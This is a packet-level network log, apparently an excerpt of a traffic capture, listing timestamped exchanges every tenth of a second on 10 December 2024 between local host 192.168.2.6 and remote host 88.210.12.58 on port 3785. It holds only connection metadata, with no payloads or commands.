Dec 10, 2024 09:00:33.003113031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.034687042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.104115963 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.122739077 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.204247952 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.223613977 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.305088043 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.323698044 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.405134916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.424705982 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.505091906 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.524653912 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.608824968 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.624560118 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.706094980 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.728226900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.807085037 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.825541973 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:33.908801079 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:33.926609039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.008804083 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.028191090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.109169960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.128757954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.209089041 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.229180098 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.310096025 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.328644037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.411118031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.429476976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.512289047 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.530543089 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.612144947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.640276909 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.713078976 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.731667995 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.814100981 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.832564116 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:34.914159060 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:34.933698893 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.015166998 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.033581972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.116807938 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.135101080 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.216272116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.236341953 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.317426920 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.335793972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.418076992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.436943054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.518078089 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.537529945 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.620806932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.641061068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.720813990 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.740257025 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.821202040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.840262890 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:35.924808025 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:35.940751076 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.022102118 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.044343948 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.123111963 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.141737938 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.223134041 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.242664099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.324130058 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.342663050 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.424098015 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.443687916 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.525113106 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.543571949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.625125885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.644968987 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.726097107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.744646072 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.826138973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.845666885 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:36.927243948 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:36.945645094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.027093887 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.046811104 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.128859043 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.146810055 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.228832960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.248445034 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.328164101 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.348788023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.429177046 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.447781086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.532826900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.549015045 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.632832050 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.652456045 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.731122017 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.752614975 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.832818985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.850769997 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:37.932116985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:37.952297926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.032099962 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.051598072 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.132164955 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.151592970 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.233133078 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.251585960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.333142042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.352595091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.434096098 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.452610970 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.534090996 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.553436041 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.634139061 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.653506041 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.734131098 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.753655910 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.835169077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.853543997 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:38.936089993 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:38.954571009 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.036166906 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.055521011 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.138916969 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.156106949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.236099958 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.258335114 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.338890076 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.355977058 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.438877106 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.458597898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.537101030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.558355093 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.639045000 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.656599045 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.739125967 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.758517981 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.843444109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.858659983 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:39.946816921 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:39.962933064 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.043126106 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.066371918 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.144167900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.162760973 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.245146990 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.263751984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.346120119 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.364623070 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.446197987 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.465574026 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.547116041 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.565687895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.647115946 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.666585922 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.748110056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.766671896 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.848104954 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.867600918 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:40.949162960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:40.967550039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.049226046 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.068583965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.150852919 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.169229984 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.254829884 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.273886919 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.351129055 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.374887943 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.454607010 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.471266031 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.554816961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.575505018 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.653110027 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.675920963 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.754921913 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.773952961 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.854129076 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.875400066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:41.954113960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:41.973601103 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.055192947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.073657990 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.156109095 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.176512957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.256151915 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.275516033 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.357110977 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.375713110 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.457128048 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.476568937 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.558165073 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.576617002 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.658128023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.677633047 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.759092093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.777529001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.859090090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.878482103 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:42.959088087 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:42.978527069 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.060107946 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.078495979 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.160820007 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.179788113 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.261089087 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.280267954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.364829063 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.380486965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.462114096 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.484450102 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.562096119 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.582386971 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.664836884 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.681572914 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.764190912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.784277916 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.864835024 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.883650064 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:43.964154005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:43.984308004 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:44.064137936 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:44.083827019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:44.165146112 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:44.184012890 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:44.265219927 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:44.284785032 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:44.365194082 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:44.384725094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:44.484606028 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:44.566389084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:44.686965942 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:44.770092010 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:44.890292883 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.074131012 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.175122023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.193831921 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.276119947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.295041084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.376852989 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.395617962 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.480844975 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.496380091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.577143908 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.600435972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.677195072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.696789980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.777132988 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.796664000 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.880878925 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:45.896766901 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:45.978130102 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.000442028 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.079129934 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.098100901 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.179210901 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.198585987 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.279180050 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.298755884 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.380170107 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.398689032 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.481224060 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.499768019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.581171036 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.602503061 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.681196928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.701020956 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.782150030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.800652981 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.882206917 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:46.901714087 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:46.983155966 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:47.001765013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:47.088882923 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:47.102740049 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:47.183161974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:47.208321095 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:47.284168959 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:47.302740097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:47.388884068 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:47.403686047 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:47.491058111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:47.508395910 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:47.610521078 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.001266003 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.102173090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.121042967 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.203205109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.222031116 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.304178953 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.322685003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.405165911 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.423829079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.505146980 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.524652958 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.605150938 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.624629974 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.706298113 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.724581003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.806346893 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.825723886 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:48.906189919 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:48.925735950 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.007217884 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.025614977 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.108897924 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.126533031 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.209201097 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.228326082 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.309170008 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.328608036 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.412904978 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.428522110 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.512900114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.532253981 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.612903118 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.632500887 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.711174965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.732382059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.812908888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.830545902 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:49.911196947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:49.932295084 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.012681961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.030839920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.113219976 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.132384062 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.214220047 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.232767105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.315237999 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.333723068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.416284084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.434743881 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.516238928 CET	49723	3785	192.168.2.6	88.210.12.58
